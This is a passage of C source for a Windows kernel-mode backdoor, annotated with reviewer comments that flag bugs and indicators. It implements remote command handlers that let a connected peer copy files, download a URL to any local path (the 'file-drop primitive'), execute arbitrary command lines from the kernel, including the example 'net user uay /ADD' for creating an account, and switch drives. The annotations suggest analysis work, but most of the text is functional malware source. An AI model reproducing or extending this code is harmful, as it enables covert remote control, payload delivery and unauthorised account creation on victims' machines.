 */
NTSTATUS CommAnd_Copy(PRECVLIST	pRecvList,ULONG Argc,CHAR* Argv[]) 
{ 
	HANDLE					hFile_source,hFile_dest; 
	OBJECT_ATTRIBUTES		oA_source,oA_dest; 
	UNICODE_STRING			nAme_source,nAme_dest; 
	NTSTATUS				dwStAtus;	// not initialized: see header note 
	IO_STATUS_BLOCK			IoStAtusBlock; 
 
	// Stack arrays replaced with pool allocations to spare kernel stack 
	// (see the author's commented-out declarations). 
	WCHAR		*tempforpAth_source,*tempforpAth_dest;	// full "\??\..." NT paths 
	WCHAR		*tempforArg_source,*tempforArg_dest;	// Argv[1]/Argv[2] as WCHAR 
 
	CHAR		*CopyBuffer;	// 1024-byte transfer buffer 
	ULONG		CopyLength;	// bytes returned by the last read 
 
	// NOTE(review): none of these allocations is NULL-checked. 
	CopyBuffer			= ExAllocatePool(PagedPool,1024); 
	tempforpAth_source	= ExAllocatePool(PagedPool,MAXPATHLENGTH_W); 
	tempforpAth_dest	= ExAllocatePool(PagedPool,MAXPATHLENGTH_W); 
	tempforArg_source	= ExAllocatePool(PagedPool,MAXARGLENGTH_W); 
	tempforArg_dest		= ExAllocatePool(PagedPool,MAXARGLENGTH_W); 
 
 
	 
	// BUG: both Argc branches return dwStAtus without it having been set. 
	if (Argc > 3){ 
		uSend( 
			pRecvList->pConnection, 
			"too mAny Arguments\n", 
			strlen("too mAny Arguments\n") 
			); 
		goto end_CommAnd_Copy; 
	} 
	if (Argc < 3){ 
		uSend( 
			pRecvList->pConnection, 
			"too few Arguments\n", 
			strlen("too few Arguments\n") 
			); 
		goto end_CommAnd_Copy; 
	} 
 
	RtlZeroMemory(tempforArg_source,MAXARGLENGTH_W); 
	RtlZeroMemory(tempforArg_dest,MAXARGLENGTH_W); 
	DbgPrint("strlen(Argv[1]):%d\n",strlen(Argv[1]));//debug 
	DbgPrint("strlen(Argv[2]):%d\n",strlen(Argv[2])); 
	if(strlen(Argv[1]) < MAXARGLENGTH_A && strlen(Argv[2]) < MAXARGLENGTH_A){ 
		Atow(Argv[1],tempforArg_source); 
		Atow(Argv[2],tempforArg_dest); 
	}else{ 
		uSend( 
			pRecvList->pConnection, 
			"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
			strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
			); 
		goto end_CommAnd_Copy; 
	} 
 
	RtlZeroMemory(tempforpAth_source,MAXPATHLENGTH_W); 
	RtlZeroMemory(tempforpAth_dest,MAXPATHLENGTH_W); 
	RtlCopyMemory(tempforpAth_source,L"\\??\\",sizeof(L"\\??\\")); 
	RtlCopyMemory(tempforpAth_dest,L"\\??\\",sizeof(L"\\??\\")); 
 
	if(tempforArg_source[1] == L':' && tempforArg_source[0] != L' '){ 
		// Absolute path with drive letter: "\??\" + arg 
		if ((wcslen(tempforpAth_source) + wcslen(tempforArg_source))*2 < MAXPATHLENGTH_W){ 
			wcscat(tempforpAth_source,tempforArg_source); 
		}else{ 
			uSend( 
				pRecvList->pConnection, 
				"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
				strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
				); 
			goto end_CommAnd_Copy; 
		} 
	}else{ 
		// Relative path: "\??\" + m_PAth + arg (m_PAth is expected to end in "\") 
		DbgPrint("(wcslen(tempforpAth_source) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_source) : %d\n",wcslen(tempforpAth_source) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_source));//debug 
		 
		if((wcslen(tempforpAth_source) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_source))*2 < MAXPATHLENGTH_W){ 
			wcscat(tempforpAth_source,pRecvList->pConnection->m_PAth); 
			wcscat(tempforpAth_source,tempforArg_source); 
		}else{ 
			uSend( 
				pRecvList->pConnection, 
				"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
				strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
				); 
			goto end_CommAnd_Copy; 
		} 
	} 
	if(tempforArg_dest[1] == L':' && tempforArg_dest[0] != L' '){ 
		// Absolute destination 
		if ((wcslen(tempforpAth_dest) + wcslen(tempforArg_dest))*2 < MAXPATHLENGTH_W){ 
			wcscat(tempforpAth_dest,tempforArg_dest); 
		}else{ 
			uSend( 
				pRecvList->pConnection, 
				"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
				strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
				); 
			goto end_CommAnd_Copy; 
		} 
	}else{ 
		// Relative destination 
		DbgPrint("wcslen(tempforpAth_dest) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_dest):%d\n",wcslen(tempforpAth_dest) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_dest)); 
		if((wcslen(tempforpAth_dest) + wcslen(pRecvList->pConnection->m_PAth) + wcslen(tempforArg_dest))*2 < MAXPATHLENGTH_W){ 
			wcscat(tempforpAth_dest,pRecvList->pConnection->m_PAth); 
			wcscat(tempforpAth_dest,tempforArg_dest); 
		}else{ 
			uSend( 
				pRecvList->pConnection, 
				"hAy! file nAme is too long,do you wAnnA A overflow?\n", 
				strlen("hAy! file nAme is too long,do you wAnnA A overflow?\n") 
				); 
			goto end_CommAnd_Copy; 
		} 
	} 
	DbgPrint("copy source: %S\n",tempforpAth_source);//debug 
	DbgPrint("copy dest: %S\n",tempforpAth_dest);//debug 
	RtlInitUnicodeString(&nAme_source,tempforpAth_source); 
	RtlInitUnicodeString(&nAme_dest,tempforpAth_dest); 
	InitializeObjectAttributes( 
			&oA_source, 
			&nAme_source, 
			OBJ_CASE_INSENSITIVE, 
			NULL, 
			NULL 
			); 
	InitializeObjectAttributes( 
			&oA_dest, 
			&nAme_dest, 
			OBJ_CASE_INSENSITIVE, 
			NULL, 
			NULL 
			); 
 
 
	// Synchronous, non-alerting I/O so the read/write loop below can rely on 
	// IoStAtusBlock.Information being filled in on return. 
	dwStAtus = ZwOpenFile( 
					&hFile_source, 
					GENERIC_READ|SYNCHRONIZE, 
					&oA_source, 
					&IoStAtusBlock, 
					FILE_SHARE_READ, 
					FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE 
					); 
	DbgPrint("ZwOpenFile dwStAtus: 0x%x\n",dwStAtus);//debug 
	DbgPrint("ZwOpenFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug 
	// Second clause is redundant; any failure is reported as "do not exists". 
	if (dwStAtus != STATUS_SUCCESS || dwStAtus == STATUS_OBJECT_NAME_NOT_FOUND){ 
		uSend( 
			pRecvList->pConnection, 
			Argv[1], 
			strlen(Argv[1]) 
			); 
		uSend( 
			pRecvList->pConnection, 
			" do not exists\n", 
			strlen(" do not exists\n") 
			); 
		goto end_CommAnd_Copy; 
	} 
 
	// FILE_CREATE: fail rather than clobber an existing destination. 
	// ShareAccess 0: exclusive while the copy runs. 
	dwStAtus = ZwCreateFile( 
					&hFile_dest, 
					GENERIC_WRITE|SYNCHRONIZE, 
					&oA_dest, 
					&IoStAtusBlock, 
					0, 
					FILE_ATTRIBUTE_NORMAL, 
					0, 
					FILE_CREATE, 
					FILE_SYNCHRONOUS_IO_NONALERT, 
					NULL, 
					0 
					); 
	DbgPrint("ZwCreAteFile dwStAtus: 0x%x\n",dwStAtus);//debug 
	DbgPrint("ZwCreAteFile IoStAtusBlock.StAtus: 0x%x\n",IoStAtusBlock.Status);//debug 
	 
	// BUG: hFile_source is leaked on this path (no ZwClose before the goto). 
	if (dwStAtus != STATUS_SUCCESS){ 
		uSend( 
			pRecvList->pConnection, 
			"file AlreAdy exists or bAd pAth\n", 
			strlen("file AlreAdy exists or bAd pAth\n") 
			); 
		goto end_CommAnd_Copy; 
	} 
	// Prime the loop with the first read; Information carries the byte count. 
	dwStAtus = ZwReadFile( 
					hFile_source, 
					NULL, 
					NULL, 
					NULL, 
					&IoStAtusBlock, 
					CopyBuffer, 
					1024, 
					NULL, 
					NULL 
					); 
	CopyLength = IoStAtusBlock.Information; 
	// Loop until a read fails or reaches end of file.  The write status is 
	// not checked, so write errors are invisible. 
	while(NT_SUCCESS(dwStAtus)){ 
		ZwWriteFile( 
			hFile_dest, 
			NULL, 
			NULL, 
			NULL, 
			&IoStAtusBlock, 
			CopyBuffer, 
			CopyLength, 
			NULL, 
			NULL 
			); 
		dwStAtus = ZwReadFile( 
						hFile_source, 
						NULL, 
						NULL, 
						NULL, 
						&IoStAtusBlock, 
						CopyBuffer, 
						1024, 
						NULL, 
						NULL 
						); 
		CopyLength = IoStAtusBlock.Information; 
	} 
 
	ZwClose(hFile_source); 
	ZwClose(hFile_dest); 
 
end_CommAnd_Copy: 
	ExFreePool(CopyBuffer); 
	ExFreePool(tempforpAth_source); 
	ExFreePool(tempforpAth_dest); 
	ExFreePool(tempforArg_source); 
	ExFreePool(tempforArg_dest); 
	return dwStAtus;	// the terminating read status after a full copy 
 
 
 
	return STATUS_SUCCESS;	// unreachable 
} 
//-------------------------------------------------------------------- 
/*
 * CommAnd_Wget - download Argv[1] (a URL) to Argv[2] (a full local file
 * name) by way of KWget, which is declared above and implemented elsewhere.
 * This is the backdoor's file-drop primitive; nothing here restricts the
 * destination path.
 *
 * Returns STATUS_SUCCESS unconditionally; a FALSE from KWget is reported to
 * the peer as "os version not support".
 *
 * Known defect, left as-is in this review: the combined-length guard only
 * sends a message and then falls through, so KWget is still called with
 * the over-long arguments.  The limit of 98 presumably mirrors a buffer
 * inside KWget -- confirm there.  The message also lacks a trailing "\n",
 * unlike every other reply in this file.
 */
NTSTATUS CommAnd_Wget(PRECVLIST	pRecvList,ULONG Argc,CHAR* Argv[]) 
{ 
	BOOLEAN		result; 
	if(Argc != 3){ 
		uSend( 
			pRecvList->pConnection, 
			"wrong Arguments\n wget URL fullFileNAme\n", 
			strlen("wrong Arguments\n wget URL fullFileNAme\n") 
			); 
		return STATUS_SUCCESS; 
	} 
	// BUG: advisory only -- no return after the warning. 
	if(strlen(Argv[1]) + strlen(Argv[2]) >= 98){ 
		uSend( 
			pRecvList->pConnection, 
			"Arguments Are too long", 
			strlen("Arguments Are too long") 
			); 
	} 
	result = KWget(Argv[1],Argv[2]); 
	if(result == FALSE){ 
		uSend( 
			pRecvList->pConnection, 
			"os version not support\n", 
			strlen("os version not support\n") 
			); 
	} 
	return STATUS_SUCCESS; 
} 
//-------------------------------------------------------------------- 
/*
 * CommAnd_Exec - hand Argv[1] as a command line to KExec (declared above,
 * implemented elsewhere).  The quoting in the usage text suggests GetArg
 * treats a double-quoted span as a single argument -- confirm in utils.c.
 *
 * Reviewer note: the built-in example, `exec "net user uay /ADD"`, shows
 * the intended use (creating a local account from the kernel backdoor) and
 * is a handy string indicator for this sample.  No length check is applied
 * to Argv[1] here, unlike CommAnd_Wget; whatever bound exists lives in
 * KExec.
 *
 * Returns STATUS_SUCCESS unconditionally; a FALSE from KExec is reported
 * to the peer as "os version not support".
 */
NTSTATUS CommAnd_Exec(PRECVLIST	pRecvList,ULONG Argc,CHAR* Argv[]) 
{ 
	BOOLEAN		result; 
	if(Argc != 2){ 
		uSend( 
			pRecvList->pConnection, 
			"wrong Arguments\n eg: exec \"c:\\WINDOWS\\System32\\freecell.exe\" or\n     exec \"net user uay /ADD\"\n", 
			strlen("wrong Arguments\n eg: exec \"c:\\WINDOWS\\System32\\freecell.exe\" or\n     exec \"net user uay /ADD\"\n") 
			); 
		return STATUS_SUCCESS; 
	} 
	result = KExec(Argv[1]); 
	if(result == FALSE){ 
		uSend( 
			pRecvList->pConnection, 
			"os version not support\n", 
			strlen("os version not support\n") 
			); 
	} 
 
	return STATUS_SUCCESS; 
} 
//-------------------------------------------------------------------- 
//A drive is considered to exist if its root directory can be opened.
/*
 * CommAnd_ChAngeDriver - switch the connection's current directory to the
 * root of drive Argv[1] (a single letter), e.g. "chAngedriver d".
 *
 * The drive is probed by opening "\??\X:\" as a directory; on success
 * m_PAth is replaced with "X:\" (the "\??\" prefix dropped).
 * Returns STATUS_SUCCESS unconditionally; errors go to the peer via uSend.
 *
 * Known defects, left as-is in this review:
 *  - The letter test uses strict comparisons, so 'a', 'z', 'A' and 'Z' are
 *    rejected with "wrong driver,must be A-Z".
 *  - m_PAth is zeroed over 512 bytes, a size assumed from structs.h (not
 *    visible here); CommAnd_Cd bounds the same field against
 *    MAXPATHLENGTH_W (1022 bytes) -- one of the two is wrong, confirm.
 *  - The second clause of the status test is redundant.
 */
NTSTATUS CommAnd_ChAngeDriver(PRECVLIST	pRecvList,ULONG Argc,CHAR* Argv[]) 
{ 
	CHAR		tempA[16]	= {0};	// "\??\X:\" -- 7 chars, fits 
	WCHAR		tempW[16]	= {0};	// same, widened 
 
	HANDLE				hFile; 
	NTSTATUS			stAtus; 
	IO_STATUS_BLOCK		IoStAtusBlock; 
	UNICODE_STRING		nAme; 
	OBJECT_ATTRIBUTES	oA; 
 
	if(Argc != 2){ 
		uSend( 
			pRecvList->pConnection, 
			"wrong Arguments\n eg: chAngedriver d\n", 
			strlen("wrong Arguments\n eg: chAngedriver d\n") 
			); 
		return STATUS_SUCCESS; 
	} 
	// Exactly one character; this is what keeps tempA within bounds below. 
	if(strlen(Argv[1]) > 1){ 
		uSend( 
			pRecvList->pConnection, 
			"wrong Arguments\n eg: chAngedriver d\n", 
			strlen("wrong Arguments\n eg: chAngedriver d\n") 
			); 
		return STATUS_SUCCESS; 
	} 
	// BUG: '>' / '<' should be '>=' / '<='; the end letters are excluded. 
	if((Argv[1][0] > 'a' && Argv[1][0] < 'z') || (Argv[1][0] > 'A' && Argv[1][0] < 'Z')){ 
		strcpy(tempA,"\\??\\"); 
		strcat(tempA,Argv[1]); 
		strcat(tempA,":\\"); 
		DbgPrint("%s\n",tempA); 
		// tempA is now "\??\X:\" 
		Atow(tempA,tempW); 
		DbgPrint("%S\n",tempW); 
		RtlInitUnicodeString(&nAme,tempW); 
		InitializeObjectAttributes( 
			&oA, 
			&nAme, 
			OBJ_CASE_INSENSITIVE, 
			NULL, 
			NULL 
			); 
		// Probe the drive by opening its root directory. 
		stAtus = ZwOpenFile( 
					&hFile, 
					GENERIC_READ, 
					&oA, 
					&IoStAtusBlock, 
					FILE_SHARE_READ, 
					FILE_DIRECTORY_FILE 
					); 
		DbgPrint("stAtus: 0x%x\n IoStAtusBlock.StAtus: 0x%x\n",stAtus,IoStAtusBlock.Status); 
		// Second clause redundant; no handle to close on this path. 
		if(stAtus != STATUS_SUCCESS || stAtus == STATUS_OBJECT_NAME_NOT_FOUND){ 
			uSend( 
			pRecvList->pConnection, 
			"driver does not exists\n", 
			strlen("driver does not exists\n") 
			); 
			return STATUS_SUCCESS; 
		} 
		else{ 
			// Assumes m_PAth is 512 bytes -- declared in structs.h, not visible here. 
			RtlZeroMemory(pRecvList->pConnection->m_PAth,512); 
			wcscpy(pRecvList->pConnection->m_PAth,&tempW[4]);	// skip the leading "\??\" 
			ZwClose(hFile); 
			return STATUS_SUCCESS; 
		} 
	} 
	else{ 
		uSend( 
			pRecvList->pConnection, 
			"wrong driver,must be A-Z\n", 
			strlen("wrong driver,must be A-Z\n") 
			); 
	} 
	return STATUS_SUCCESS; 
} 
//--------------------------------------------------------------------